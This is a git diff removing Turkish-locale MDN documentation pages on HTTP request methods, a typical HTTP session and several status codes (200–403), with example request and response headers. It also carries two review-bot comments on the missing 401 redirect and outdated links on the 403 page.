a/files/tr/web/http/methods/index.html +++ /dev/null 
@@ -1,73 +0,0 @@ ---- -title: HTTP istek metotları -slug: Web/HTTP/Methods -tags: - - HTTP - - Metotlar -translation_of: Web/HTTP/Methods -original_slug: Web/HTTP/metotlar ---- -<div>{{HTTPSidebar}}</div> - -<p><span class="tlid-translation translation" lang="tr">HTTP, belirli bir kaynak üzerinde yapılması istenen eylemi belirten bir dizi <strong>istek metodu</strong> tanımlamaktadır. Bu istek metotları aslında isim olabildiği halde, bazen <em>HTTP fiilleri</em> olarak da adlandırılır. Bunların her biri farklı bir anlam ifade etse de, bazılarının ortak özellikleri bulunur: örneğin bir istek metodu {{glossary ("safe")}}, {{glossary ("idempotent")}} veya {{glossary ("cacheable")}} olabilir.</span></p> - -<dl> - <dt><code><a href="/tr/docs/Web/HTTP/Methods/GET">GET</a></code></dt> - <dd><code>GET</code> metodu <span class="tlid-translation translation" lang="tr"> belirtilen kaynağın bir temsilini ister. </span> <code>GET</code> <span class="tlid-translation translation" lang="tr">kullanan istekler yalnızca veri almalıdır.</span></dd> - <dt><code><a href="/tr/docs/Web/HTTP/Methods/HEAD">HEAD</a></code></dt> - <dd><code>HEAD</code> <span class="tlid-translation translation" lang="tr">metodu </span><code>GET</code> <span class="tlid-translation translation" lang="tr">isteği ile tamamen aynı olan sadece gövdesi olmayan bir yanıt ister.</span></dd> - <dt><code><a href="/tr/docs/Web/HTTP/Methods/POST">POST</a></code></dt> - <dd><code>POST</code> <span class="tlid-translation translation" lang="tr">metodu belirtilen kaynağa bir varlık (entity) göndermek için kullanılır, bu da genellikle sunucuda bir durum değişikliği ya da yan etkilere neden olur.</span></dd> - <dt><code><a href="/tr/docs/Web/HTTP/Methods/PUT">PUT</a></code></dt> - <dd> - <p><code>PUT</code> <span class="tlid-translation translation" lang="tr">metodu hedefte bulunan kaynağın tüm geçerli temsillerinin yerine istek yükünü (request payload) koyar.</span></p> - </dd> - <dt><code><a 
href="/tr/docs/Web/HTTP/Methods/DELETE">DELETE</a></code></dt> - <dd><code>DELETE</code> metodu belirtilen kaynağı siler.</dd> - <dt><code><a href="/tr/docs/Web/HTTP/Methods/CONNECT">CONNECT</a></code></dt> - <dd> - <p><code>CONNECT</code> metodu <span class="tlid-translation translation" lang="tr">hedefteki kaynak tarafından tanımlanan sunucuya bir tünel oluşturur</span>.</p> - </dd> - <dt><code><a href="/tr/docs/Web/HTTP/Methods/OPTIONS">OPTIONS</a></code></dt> - <dd><code>OPTIONS</code> metodu <span class="tlid-translation translation" lang="tr">hedefteki kaynağın iletişim seçeneklerini tanımlamak için kullanılır.</span></dd> - <dt><code><a href="/tr/docs/Web/HTTP/Methods/TRACE">TRACE</a></code></dt> - <dd> - <p><code>TRACE</code> metodu <span class="tlid-translation translation" lang="tr">hedefteki kaynağa giden yol boyunca bir mesaj loop-back testi gerçekleştirir.</span></p> - </dd> - <dt><code><a href="/tr/docs/Web/HTTP/Methods/PATCH">PATCH</a></code></dt> - <dd><code>PATCH</code> metodu <span class="tlid-translation translation" lang="tr">bir kaynağa kısmi değişiklikler uygulamak için kullanılır.</span></dd> -</dl> - -<h2 id="Tanımlar">Tanımlar</h2> - -<table class="standard-table"> - <tbody> - <tr> - <th scope="col">Specification</th> - <th scope="col">Başlık</th> - <th scope="col">Yorum</th> - </tr> - <tr> - <td>{{RFC("7231", "Request methods", "4")}}</td> - <td>Hypertext Transfer Protocol (HTTP/1.1): Semantics and Content</td> - <td>GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE tanımlanıyor.</td> - </tr> - <tr> - <td>{{RFC("5789", "Patch method", "2")}}</td> - <td>PATCH Method for HTTP</td> - <td>PATCH tanımlanıyor.</td> - </tr> - </tbody> -</table> - -<h2 id="Tarayıcı_uyumluluğu">Tarayıcı uyumluluğu</h2> - -<p class="hidden"><span class="tlid-translation translation" lang="tr">Bu uyumluluk verilerine katkıda bulunmak için, lütfen bu dosya için bir çekme isteği yazın</span>: <a 
href="https://github.com/mdn/browser-compat-data/blob/master/http/methods.json">https://github.com/mdn/browser-compat-data/blob/master/http/methods.json</a>.</p> - -<p>{{Compat("http/methods")}}</p> - -<h2 id="Bakınız">Bakınız</h2> - -<ul> - <li><a href="/tr/docs/Web/HTTP/Headers">HTTP başlıkları</a></li> -</ul> diff --git a/files/tr/web/http/session/index.html b/files/tr/web/http/session/index.html deleted file mode 100644 index 739b4102a6..0000000000 --- a/files/tr/web/http/session/index.html +++ /dev/null 
@@ -1,174 +0,0 @@ ---- -title: Tipik bir HTTP oturumu -slug: Web/HTTP/Session -tags: - - HTTP -translation_of: Web/HTTP/Session -original_slug: Web/HTTP/Oturum ---- -<div>{{HTTPSidebar}}</div> - -<p><span class="tlid-translation translation" lang="tr">HTTP gibi istemci-sunucu protokollerinde, oturumlar üç aşamadan oluşur:</span></p> - -<ol> - <li><span class="tlid-translation translation" lang="tr"> İstemci bir TCP bağlantısı kurar (veya taşıma katmanı TCP değilse uygun bir bağlantı kurar).</span></li> - <li><span class="tlid-translation translation" lang="tr">İstemci isteğini gönderir ve cevabı bekler.</span></li> - <li><span class="tlid-translation translation" lang="tr">Sunucu isteği işler, bir durum kodu ve uygun verileri içeren cevabını geri gönderir.</span></li> -</ol> - -<p>HTTP/1.1'den itibaren, artık <span class="tlid-translation translation" lang="tr">üçüncü aşama tamamlandıktan sonra bağlantı kapanmaz ve istemciye başka bir istek daha verilir: yani ikinci ve üçüncü aşamalar artık istenildiği kadar tekrarlanabilir.</span></p> - -<h2 id="Bağlantı_kurma">Bağlantı kurma</h2> - -<p><span class="tlid-translation translation" lang="tr">İstemci-sunucu protokollerinde bağlantıyı kuran istemcidir.</span> <span class="tlid-translation translation" lang="tr">HTTP'de bağlantı açmak, altta yatan taşıma katmanında bağlantı başlatmak anlamına gelir; bu da genellikle TCP'dir</span>.</p> - -<p><span class="tlid-translation translation" lang="tr">TCP ile bir bilgisayardaki HTTP sunucusu için varsayılan port 80'dir. 8000 veya 8080 gibi diğer portlar da kullanılabilir. </span> Getirilecek <span class="tlid-translation translation" lang="tr">sayfanın URL'si, alan adını ve port numarasını içerir; eğer port 80 ise yazılmasa da olur</span>. 
Ayrıntılı bilgi için bakınız: <a href="/tr/docs/Web/HTTP/Basics_of_HTTP/Identifying_resources_on_the_Web">Web'de kaynakları belirleme</a>.</p> - -<div class="note"><strong>Not:</strong> <span class="tlid-translation translation" lang="tr">İstemci-sunucu modeli, sunucunun istemciye açık bir istek olmadan veri göndermesine izin vermez. Bu soruna geçici bir çözüm bulmak için, web geliştiricileri bazı teknikler kullanmaktadır:</span> {{domxref("XMLHTTPRequest")}}, {{domxref("Fetch")}} API , <a href="/en/WebSockets" title="en/WebSockets">WebSockets API</a>, veya benzer protokolleri kullanarak düzenli aralıklarla sunucu ping'lenir.</div> - -<h2 id="İstemci_isteği_gönderimi">İstemci isteği gönderimi</h2> - -<p>Bağlantı kurulduktan sonra, kullanıcı aracısı -user agent- istek gönderebilir (kullanıcı aracısı genellikle bir web tarayıcısıdır, ancak crawler gibi başka bir program da olabilir). Bir istemci isteği, CRLF ile ayrılan (satır başı, ardından satır sonu karakteri), üç bloğa bölünmüş metin direktiflerinden oluşur:</p> - -<ol> - <li>İlk satırda bir istek yöntemi ve ardından gelen parametreleri bulunur: - <ul> - <li>belgenin yolu, yani protokol veya alan adı olmayan mutlak bir URL</li> - <li>HTTP protokolü sürümü</li> - </ul> - </li> - <li>Sonraki satırlar sunucuya hangi tür verilerin uygun olduğu (kullanılacak dil veya MIME türleri gibi) veya davranışını değiştiren başka veriler (örneğin önbelleğe alınmışsa bir yanıt göndermeme) hakkında bilgi veren bir HTTP başlığını temsil eder. 
Bu HTTP başlıkları boş bir satırla biten bir blok oluşturur.</li> - <li>Son blok genellikle POST metodu tarafından kullanılan ek verileri barındıran isteğe bağlı bir veri bloğudur.</li> -</ol> - -<h3 id="İstek_örnekleri">İstek örnekleri</h3> - -<p>developer.mozilla.org sitesinin kök sayfasını yani <a class="linkification-ext external" href="/" title="Linkification: http://developer.mozilla.org/">http://developer.mozilla.org/</a> sayfasını getirme, ve sunucuya kullanıcı aracısının sayfayı mümkünse Fransızca olarak tercih ettiğini bildirmek:</p> - -<pre>GET / HTTP/1.1 -Host: developer.mozilla.org -Accept-Language: fr -</pre> - -<p>Sondaki boş satırın veri bloğunu başlık bloğundan ayırdığına dikkat ediniz. HTTP başlığı olarak <code>Content-Length</code> belirtilmediğinden bu veri bloğu boş olarak sunulur, böylece başlıkların bittiğini işaret ederek sunucunun bu boş satırı alır almaz isteği işlemesine imkan verir.</p> - -<p>Örneğin bir formun sonucunu gönderme:</p> - -<pre>POST /iletisim_formu.php HTTP/1.1 -Host: developer.mozilla.org -Content-Length: 64 -Content-Type: application/x-www-form-urlencoded - -adi=Joe%20Kullanici&istegi=Bana%20bir%20katalog%20gonderir%20misiniz -</pre> - -<h3 id="İstek_metotları">İstek metotları</h3> - -<p>HTTP protokolü bir kaynak üzerinde gerçekleştirilmek istenen eylemi belirten bir dizi <a href="/tr/docs/Web/HTTP/Methods">istek metodu</a> tanımlamaktadır. Bu isteklere aslında isim de olabildikleri halde HTTP fiileri de denilir. En sık kullanılan istekler <code>GET</code> ve <code>POST</code>'tur:</p> - -<ul> - <li>{{HTTPMethod("GET")}} metodu belirtilen kaynağın bir veri temsilini talep eder. <code>GET</code> ile yapılan istekler yalnızca veri almalıdır.</li> - <li>{{HTTPMethod("POST")}} metodu sunucuya durumunu değiştirmesi için veri gönderir. 
<a href="/tr/docs/Web/Guide/HTML/Forms">HTML Formları</a>'nda genellikle bu metot kullanılır.</li> -</ul> - -<h2 id="Sunucu_yanıtının_yapısı">Sunucu yanıtının yapısı</h2> - -<p>Bağlanan aracı isteğini gönderdikten sonra, web sunucusu isteği işler ve sonuçta bir yanıt verir. İstemci isteğine benzer şekilde, sunucunun yanıtı CRLF ile ayrılan ve üç bloğa bölünmüş metin direktiflerinden oluşur:</p> - -<ol> - <li>İlk satır, <em>durum satırı</em>, kullanılan HTTP sürümünün onayı ve ardından bir durum isteğinden (ve insan tarafından okunabilen kısa bir açıklamadan) oluşur.</li> - <li>Sonraki satırlar gönderilen veri hakkında istemciye bilgi veren (tür, veri boyutu, kullanılan sıkıştırma algoritması, önbelleğe alma hakkında ipuçları vb.) belirli HTTP başlıklarını içerir. İstemci isteğinde olduğu gibi, bu HTTP başlıkları da boş bir satırla biten bir blok oluşturur.</li> - <li>Son blok isteğe bağlı verileri içeren bir veri bloğudur.</li> -</ol> - -<h3 id="Cevap_örnekleri">Cevap örnekleri</h3> - -<p>Başarılı bir web sayfası isteği yanıtı:</p> - -<pre>HTTP/1.1 200 OK -Content-Type: text/html; charset=utf-8 -Content-Length: 55743 -Connection: keep-alive -Cache-Control: s-maxage=300, public, max-age=0 -Content-Language: en-US -Date: Thu, 06 Dec 2018 17:37:18 GMT -ETag: "2e77ad1dc6ab0b53a2996dfd4653c1c3" -Server: meinheld/0.6.1 -Strict-Transport-Security: max-age=63072000 -X-Content-Type-Options: nosniff -X-Frame-Options: DENY -X-XSS-Protection: 1; mode=block -Vary: Accept-Encoding,Cookie -Age: 7 - - -<!DOCTYPE html> -<html lang="en"> -<head> - <meta charset="utf-8"> - <title>A simple webpage</title> -</head> -<body> - <h1>Simple HTML5 webpage</h1> - <p>Hello, world!</p> -</body> -</html> -</pre> - -<p>İstenen kaynağın kalıcı olarak taşındığını belirten bildirim:</p> - -<pre>HTTP/1.1 301 Moved Permanently -Server: Apache/2.4.37 (Red Hat) -Content-Type: text/html; charset=utf-8 -Date: Thu, 06 Dec 2018 17:33:08 GMT -Location: <a class="linkification-ext" href="../../../../" 
title="Linkification: https://developer.mozilla.org/">https://developer.mozilla.org/</a> <strong><em>(bu kaynağın taşındığı yeni bağlantıdır</em><em>; kullanıcı aracısının bunu getirmesi beklenir)</em></strong> -Keep-Alive: timeout=15, max=98 -Accept-Ranges: bytes -Via: Moz-Cache-zlb05 -Connection: Keep-Alive -Content-Length: 325 <em>(<strong>içerikte kullanıcı aracısının bağlantıyı takip edememesi halinde gösterilecek varsayılan sayfa bulunur)</strong></em> - - -<!DOCTYPE html... <strong><em>(kullanıcının eksik kaynağı bulmasına yardımcı olan özelleştirilmiş bir sayfa içerir)</em></strong> -</pre> - -<p>İstenen kaynağın bulunamadığını belirten bildirim:</p> - -<pre>HTTP/1.1 404 Not Found -Content-Type: text/html; charset=utf-8 -Content-Length: 38217 -Connection: keep-alive -Cache-Control: no-cache, no-store, must-revalidate, max-age=0 -Content-Language: en-US -Date: Thu, 06 Dec 2018 17:35:13 GMT -Expires: Thu, 06 Dec 2018 17:35:13 GMT -Server: meinheld/0.6.1 -Strict-Transport-Security: max-age=63072000 -X-Content-Type-Options: nosniff -X-Frame-Options: DENY -X-XSS-Protection: 1; mode=block -Vary: Accept-Encoding,Cookie -X-Cache: Error from cloudfront - - -<!DOCTYPE html... <strong><em>(kullanıcının eksik kaynağı bulmasına yardımcı olan özelleştirilmiş bir sayfa içerir)</em></strong> -</pre> - -<h3 id="Yanıt_durumu_kodları">Yanıt durumu kodları</h3> - -<p><a href="/tr/docs/Web/HTTP/Status">HTTP yanıt durumu kodları</a> belirli bir HTTP isteğinin başarıyla tamamlanıp tamamlanmadığını gösterir. Yanıtlar beş sınıfa ayrılır: bilgilendirme yanıtları, başarı yanıtları, yönlendirmeler, istemci hataları ve sunucu hataları.</p> - -<ul> - <li>{{HTTPStatus(200)}}: Tamam. İstek başarılı oldu.</li> - <li>{{HTTPStatus(301)}}: Kalıcı olarak taşındı. Bu yanıt kodu, istenen kaynağın URI'sinin değiştirildiği anlamına gelir.</li> - <li>{{HTTPStatus(404)}}: Bulunamadı. 
Sunucu istenen kaynağı bulamıyor demektir.</li> -</ul> - -<h2 id="Bakınız">Bakınız</h2> - -<ul> - <li><a href="/tr/docs/Web/HTTP/Basics_of_HTTP/Identifying_resources_on_the_Web">Web'de kaynakları belirleme</a></li> - <li><a href="/tr/docs/Web/HTTP/Headers">HTTP başlıkları</a></li> - <li><a href="/tr/docs/Web/HTTP/Methods">HTTP istek metotları</a></li> - <li><a href="/tr/docs/Web/HTTP/Status">HTTP yanıt durumu kodları </a></li> -</ul> diff --git a/files/tr/web/http/status/200/index.html b/files/tr/web/http/status/200/index.html deleted file mode 100644 index a0f72e76f1..0000000000 --- a/files/tr/web/http/status/200/index.html +++ /dev/null 
@@ -1,53 +0,0 @@ ---- -title: 200 OK -slug: Web/HTTP/Status/200 -tags: - - 200OK nedir - - 200OK oluşturma -translation_of: Web/HTTP/Status/200 ---- -<div>{{HTTPSidebar}}</div> - -<p>HTTP cevap durum kodu <strong><code>200 OK</code></strong> isteğin başarılı olduğunu ifade eder. Bu durum koduna sahip cevaplar, varsayılan olarak önbelleğe (cache) alınabilir.</p> - -<p>Başarılı isteğin ne anlama geldiği, yapılan HTTP isteğin türüne bağlıdır:</p> - -<ul> - <li>{{HTTPMethod("GET")}}: İstenilen kaynak bulundu ve dönen cevabın gövdesinde gönderildi.</li> - <li>{{HTTPMethod("HEAD")}}: Bütün başlık mesajları (HEADER) cevabın gövdesi olarak döner.</li> - <li>{{HTTPMethod("POST")}}: Yapılan isteğe karşılık gelen sonuç, cevabın gövdesinde gönderilir.</li> - <li>{{HTTPMethod("TRACE")}}: Sunucu, aldığı isteği cevabın gövdesi olarak gönderir.</li> -</ul> - -<p>Başarılı olan {{HTTPMethod("PUT")}} veya {{HTTPMethod("DELETE")}} isteği sonucunda dönen cevap genellikle <code>200</code> <code>OK</code> değil, <code>{{HTTPStatus("204")}}</code><code>No Content (veya bir kaynak ilk kez oluşturulmuşsa {{HTTPStatus("201")}}) Created)</code> olur.</p> - -<h2 id="Durum">Durum</h2> - -<pre class="syntaxbox notranslate">200 OK</pre> - -<h2 id="Şartnameler">Şartnameler</h2> - -<table class="standard-table"> - <tbody> - <tr> - <th scope="col">Specification</th> - <th scope="col">Title</th> - </tr> - <tr> - <td>{{RFC("7231", "200 OK" , "6.3.1")}}</td> - <td>Hypertext Transfer Protokolü (HTTP/1.1): Anlam ve İçerikler</td> - </tr> - </tbody> -</table> - -<h2 id="Tarayıcı_Uyumluluğu">Tarayıcı Uyumluluğu</h2> - -<p class="hidden">Tarayıcı uyumluluğu tablosu, hazır verilerden otomatik olarak oluşturulmuştur. 
Eğer bu verilere katkıda bulunmak isteseniz, <a href="https://github.com/mdn/browser-compat-data">https://github.com/mdn/browser-compat-data</a> adresine gidin ve bize bir çekme isteğinde (pull request) bulunun.</p> - -<p>{{Compat("http.status.200")}}</p> - -<h2 id="Ayrıca_bakınız">Ayrıca bakınız</h2> - -<ul> - <li><a href="/en-US/docs/Web/HTTP/Methods">HTTP istek metodları</a></li> -</ul> diff --git a/files/tr/web/http/status/205/index.html b/files/tr/web/http/status/205/index.html deleted file mode 100644 index d212490377..0000000000 --- a/files/tr/web/http/status/205/index.html +++ /dev/null @@ -1,39 +0,0 @@ ---- -title: 205 Reset Content -slug: Web/HTTP/Status/205 -translation_of: Web/HTTP/Status/205 ---- -<p>{{HTTPSidebar}}</p> - -<p>The HTTP <strong><code>205 Reset Content</code></strong> response status tells the client to reset the document view, so for example to clear the content of a form, reset a canvas state, or to refresh the UI.</p> - -<h2 id="Status">Status</h2> - -<pre class="syntaxbox">205 Reset Content</pre> - -<h2 id="Specifications">Specifications</h2> - -<table class="standard-table"> - <tbody> - <tr> - <th scope="col">Specification</th> - <th scope="col">Title</th> - </tr> - <tr> - <td>{{RFC("7231", "205 Reset Content" , "6.3.6")}}</td> - <td>Hypertext Transfer Protocol (HTTP/1.1): Semantics and Content</td> - </tr> - </tbody> -</table> - -<h2 id="Compatibility_Notes">Compatibility Notes</h2> - -<ul> - <li>Browser behavior differs if this response erroneously includes a body on persistent connections See <a href="/en-US/docs/Web/HTTP/Status/204">204 No Content</a> for more detail.</li> -</ul> - -<h2 id="See_also">See also</h2> - -<ul> - <li>{{HTTPStatus(204)}} No Content</li> -</ul> diff --git a/files/tr/web/http/status/301/index.html b/files/tr/web/http/status/301/index.html deleted file mode 100644 index a2dcab9a0d..0000000000 --- a/files/tr/web/http/status/301/index.html +++ /dev/null 
@@ -1,55 +0,0 @@ ---- -title: 301 Kalıcı Yönlendirme -slug: Web/HTTP/Status/301 -translation_of: Web/HTTP/Status/301 ---- -<div>{{HTTPSidebar}}</div> - -<p>The HyperText Transfer Protocol (HTTP) <code><strong>301 Moved Permanently</strong></code> redirect status response code indicates that the resource requested has been definitively moved to the URL given by the {{HTTPHeader("Location")}} headers. A browser redirects to this page and search engines update their links to the resource (in 'SEO-speak', it is said that the 'link-juice' is sent to the new URL).</p> - -<p>Even if the specification requires the method (and the body) not to be altered when the redirection is performed, not all user-agents align with it - you can still find this type of bugged software out there. It is therefore recommended to use the <code>301</code> code only as a response for {{HTTPMethod("GET")}} or {{HTTPMethod("HEAD")}} methods and to use the {{HTTPStatus("308", "308 Permanent Redirect")}} for {{HTTPMethod("POST")}} methods instead, as the method change is explicitly prohibited with this status.</p> - -<h2 id="Status">Status</h2> - -<pre class="syntaxbox notranslate">301 Moved Permanently</pre> - -<h2 id="Example">Example</h2> - -<h3 id="Client_request">Client request</h3> - -<pre class="notranslate">GET /index.php HTTP/1.1 -Host: www.example.org</pre> - -<h3 id="Server_response">Server response</h3> - -<pre class="notranslate">HTTP/1.1 301 Moved Permanently -Location: http://www.example.org/index.asp</pre> - -<h2 id="Specifications">Specifications</h2> - -<table class="standard-table"> - <tbody> - <tr> - <th scope="col">Specification</th> - <th scope="col">Title</th> - </tr> - <tr> - <td>{{RFC("7231", "301 Moved Permanently" , "6.4.2")}}</td> - <td>Hypertext Transfer Protocol (HTTP/1.1): Semantics and Content</td> - </tr> - </tbody> -</table> - -<h2 id="Browser_compatibility">Browser compatibility</h2> - - - -<p>{{Compat("http.status.301")}}</p> - -<h2 id="See_also">See also</h2> - 
-<ul> - <li>{{HTTPStatus("308", "308 Permanent Redirect")}}</li> - <li>{{HTTPStatus("302", "302 Found")}}, the temporary redirect</li> - <li><a href="https://www.exai.com/blog/301-redirects">301 Redirect </a></li> -</ul> diff --git a/files/tr/web/http/status/302/index.html b/files/tr/web/http/status/302/index.html deleted file mode 100644 index 061e7bfaa2..0000000000 --- a/files/tr/web/http/status/302/index.html +++ /dev/null 
@@ -1,47 +0,0 @@ ---- -title: 302 Geçici Yönlendirme -slug: Web/HTTP/Status/302 -translation_of: Web/HTTP/Status/302 ---- -<div>{{HTTPSidebar}}</div> - -<p>The HyperText Transfer Protocol (HTTP) <code><strong>302 Found</strong></code> redirect status response code indicates that the resource requested has been temporarily moved to the URL given by the {{HTTPHeader("Location")}} header. A browser redirects to this page but search engines don't update their links to the resource (in 'SEO-speak', it is said that the 'link-juice' is not sent to the new URL).</p> - -<p>Even if the specification requires the method (and the body) not to be altered when the redirection is performed, not all user-agents conform here - you can still find this type of bugged software out there. It is therefore recommended to set the <code>302</code> code only as a response for {{HTTPMethod("GET")}} or {{HTTPMethod("HEAD")}} methods and to use {{HTTPStatus("307", "307 Temporary Redirect")}} instead, as the method change is explicitly prohibited in that case.</p> - -<p>In the cases where you want the method used to be changed to {{HTTPMethod("GET")}}, use {{HTTPStatus("303", "303 See Other")}} instead. 
This is useful when you want to give a response to a {{HTTPMethod("PUT")}} method that is not the uploaded resource but a confirmation message such as: 'you successfully uploaded XYZ'.</p> - -<h2 id="Status">Status</h2> - -<pre class="syntaxbox notranslate">302 Found</pre> - -<h2 id="Specifications">Specifications</h2> - -<table class="standard-table"> - <thead> - <tr> - <th scope="col">Specification</th> - <th scope="col">Title</th> - </tr> - </thead> - <tbody> - <tr> - <td>{{RFC("7231", "302 Found" , "6.4.3")}}</td> - <td>Hypertext Transfer Protocol (HTTP/1.1): Semantics and Content</td> - </tr> - </tbody> -</table> - -<h2 id="Browser_compatibility">Browser compatibility</h2> - - - -<p>{{Compat("http.status.302")}}</p> - -<h2 id="See_also">See also</h2> - -<ul> - <li>{{HTTPStatus("307", "307 Temporary Redirect")}}, the equivalent of this status code where the method used never changes.</li> - <li>{{HTTPStatus("303", "303 See Other")}}, a temporary redirect that changes the method used to {{HTTPMethod("GET")}}.</li> - <li>{{HTTPStatus("301", "301 Moved Permanently")}}, the permanent redirect.</li> -</ul> diff --git a/files/tr/web/http/status/400/index.html b/files/tr/web/http/status/400/index.html deleted file mode 100644 index 2d6f8ea50a..0000000000 --- a/files/tr/web/http/status/400/index.html +++ /dev/null 
@@ -1,37 +0,0 @@ ---- -title: 400 Kötü İstek -slug: Web/HTTP/Status/400 -translation_of: Web/HTTP/Status/400 ---- -<p>{{HTTPSidebar}}</p> - -<p>The HyperText Transfer Protocol (HTTP) <code><strong>400 Bad Request</strong></code> response status code indicates that the server cannot or will not process the request due to something that is perceived to be a client error (e.g., malformed request syntax, invalid request message framing, or deceptive request routing).</p> - -<div class="warning"> -<p>The client should not repeat this request without modification.</p> -</div> - -<h2 id="Status">Status</h2> - -<pre class="syntaxbox notranslate">400 Bad Request </pre> - -<h2 id="Specifications">Specifications</h2> - -<table class="standard-table"> - <tbody> - <tr> - <th scope="col">Specification</th> - <th scope="col">Title</th> - </tr> - <tr> - <td>{{RFC("7231", "400 Bad Request" , "6.5.1")}}</td> - <td>Hypertext Transfer Protocol (HTTP/1.1): Semantics and Content</td> - </tr> - </tbody> -</table> - -<h2 id="See_Also">See Also</h2> - -<ul> - <li><a href="https://www.exai.com/blog/400-bad-request-error">400 Bad Request </a></li> -</ul> diff --git a/files/tr/web/http/status/401/index.html b/files/tr/web/http/status/401/index.html deleted file mode 100644 index 1eb6e7c0d7..0000000000 --- a/files/tr/web/http/status/401/index.html +++ /dev/null 
@@ -1,54 +0,0 @@ ---- -title: 401 Yetkisiz -slug: Web/HTTP/Status/401 -translation_of: Web/HTTP/Status/401 ---- -<div>{{HTTPSidebar}}</div> - -<p>The HTTP <strong><code>401 Unauthorized</code></strong> client error status response code indicates that the request has not been applied because it lacks valid authentication credentials for the target resource.</p> - -<p>This status is sent with a {{HTTPHeader("WWW-Authenticate")}} header that contains information on how to authorize correctly.</p> - -<p>This status is similar to {{HTTPStatus("403")}}, but in this case, authentication is possible.</p> - -<h2 id="Status">Status</h2> - -<pre class="syntaxbox notranslate">401 Unauthorized</pre> - -<h2 id="Example_response">Example response</h2> - -<pre class="notranslate">HTTP/1.1 401 Unauthorized -Date: Wed, 21 Oct 2015 07:28:00 GMT -WWW-Authenticate: Basic realm="Access to staging site"</pre> - -<h2 id="Specifications">Specifications</h2> - -<table class="standard-table"> - <tbody> - <tr> - <th scope="col">Specification</th> - <th scope="col">Title</th> - </tr> - <tr> - <td>{{RFC("7235", "401 Unauthorized" , "3.1")}}</td> - <td>HTTP/1.1: Authentication</td> - </tr> - </tbody> -</table> - -<h2 id="Browser_compatibility">Browser compatibility</h2> - -<p class="hidden">The compatibility table in this page is generated from structured data. If you'd like to contribute to the data, please check out <a href="https://github.com/mdn/browser-compat-data">https://github.com/mdn/browser-compat-data</a> and send us a pull request.</p> - -<p>{{Compat("http.status.401")}}</p> - -<h2 id="See_also">See also</h2> - -<ul> - <li><a href="/en-US/docs/Web/HTTP/Authentication">HTTP authentication</a></li> - <li>{{HTTPHeader("WWW-Authenticate")}}</li> - <li>{{HTTPHeader("Authorization")}}</li> - <li>{{HTTPHeader("Proxy-Authorization")}}</li> - <li>{{HTTPHeader("Proxy-Authenticate")}}</li> - <li>{{HTTPStatus("403")}}, {{HTTPStatus("407")}}</li> -</ul> 
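Review bot: The only Turkish text in this deleted file is the front-matter line `title: 401 Yetkisiz`; every paragraph, heading and list item below it is English, so the removal drops no translated prose, but the diff gives no sign of what the `Web/HTTP/Status/401` slug resolves to under `/tr/` afterwards. The diffstat for `files/tr/web/http` shows 0 insertions, so a redirect or fallback cannot be part of this directory's changes; please say in the commit message where it is handled, or add it.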
diff --git a/files/tr/web/http/status/402/index.html b/files/tr/web/http/status/402/index.html deleted file mode 100644 index bc74ce45f1..0000000000 --- a/files/tr/web/http/status/402/index.html +++ /dev/null @@ -1,49 +0,0 @@ ---- -title: 402 Ödeme Gerekli -slug: Web/HTTP/Status/402 -translation_of: Web/HTTP/Status/402 ---- -<div>{{HTTPSidebar}}{{SeeCompatTable}}</div> - -<p>The HTTP <strong><code>402 Payment Required</code></strong> is a nonstandard client error status response code that is reserved for future use.</p> - -<p>Sometimes, this code indicates that the request can not be processed until the client makes a payment. Originally it was created to enable digital cash or (micro) payment systems and would indicate that the requested content is not available until the client makes a payment. However, no standard use convention exists and different entities use it in different contexts.</p> - -<h2 id="Status">Status</h2> - -<pre class="syntaxbox notranslate">402 Payment Required</pre> - -<h2 id="Example_response">Example response</h2> - -<pre class="brush: bash notranslate">HTTP/1.1 402 Payment Required -Date: Wed, 21 Oct 2015 07:28:00 GMT -</pre> - -<h2 id="Specifications">Specifications</h2> - -<table class="standard-table"> - <thead> - <tr> - <th scope="col">Specification</th> - <th scope="col">Title</th> - </tr> - </thead> - <tbody> - <tr> - <td>{{RFC("7231", "402 Payment Required" , "6.5.2")}}</td> - <td>HTTP/1.1: Semantics and Content</td> - </tr> - </tbody> -</table> - -<h2 id="Browser_compatibility">Browser compatibility</h2> - - - -<p>{{Compat("http.status.402")}}</p> - -<h2 id="See_also">See also</h2> - -<ul> - <li><a href="/en-US/docs/Web/HTTP/Authentication">HTTP authentication</a></li> -</ul> diff --git a/files/tr/web/http/status/403/index.html b/files/tr/web/http/status/403/index.html deleted file mode 100644 index e167459808..0000000000 --- a/files/tr/web/http/status/403/index.html +++ /dev/null 
@@ -1,52 +0,0 @@ ---- -title: 403 Yasaklı -slug: Web/HTTP/Status/403 -translation_of: Web/HTTP/Status/403 ---- -<div>{{HTTPSidebar}}</div> - -<p>The HTTP <strong><code>403 Forbidden</code></strong> client error status response code indicates that the server understood the request but refuses to authorize it.</p> - -<p>This status is similar to {{HTTPStatus("401")}}, but in this case, re-authenticating will make no difference. The access is permanently forbidden and tied to the application logic, such as insufficient rights to a resource.</p> - -<h2 id="Status">Status</h2> - -<pre class="syntaxbox notranslate">403 Forbidden</pre> - -<h2 id="Example_response">Example response</h2> - -<pre class="notranslate">HTTP/1.1 403 Forbidden -Date: Wed, 21 Oct 2015 07:28:00 GMT -</pre> - -<h2 id="Specifications">Specifications</h2> - -<table class="standard-table"> - <thead> - <tr> - <th scope="col">Specification</th> - <th scope="col">Title</th> - </tr> - </thead> - <tbody> - <tr> - <td>{{RFC("7231", "403 Forbidden" , "6.5.3")}}</td> - <td>HTTP/1.1: Semantics and Content</td> - </tr> - </tbody> -</table> - -<h2 id="Browser_compatibility">Browser compatibility</h2> - -<p class="hidden">The compatibility table in this page is generated from structured data. If you'd like to contribute to the data, please check out <a href="https://github.com/mdn/browser-compat-data">https://github.com/mdn/browser-compat-data</a> and send us a pull request.</p> - -<p>{{Compat("http.status.403")}}</p> - -<h2 id="See_also">See also</h2> - -<ul> - <li>{{HTTPStatus("401")}}</li> - <li><a href="https://kinsta.com/blog/403-forbidden-error/">403 forbidden error</a></li> - <li><a href="https://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html" rel="noopener">HTTP/1.1: Status Code Definitions</a></li> - <li><a href="https://www.exai.com/blog/403-forbidden">403 forbidden </a></li> -</ul> 
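Review bot: The `See also` list at the end of this hunk mixes the in-site `{{HTTPStatus("401")}}` entry with two third-party blog links (`kinsta.com/blog/403-forbidden-error/` and `www.exai.com/blog/403-forbidden`) and a link to `rfc2616-sec10.html`, while the Specifications table in the same file cites RFC 7231 section 6.5.3, which obsoletes RFC 2616. Deleting the file removes them here, but if this page is ever recreated from this revision, leave those three entries out and keep the RFC 7231 row as the single specification reference.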
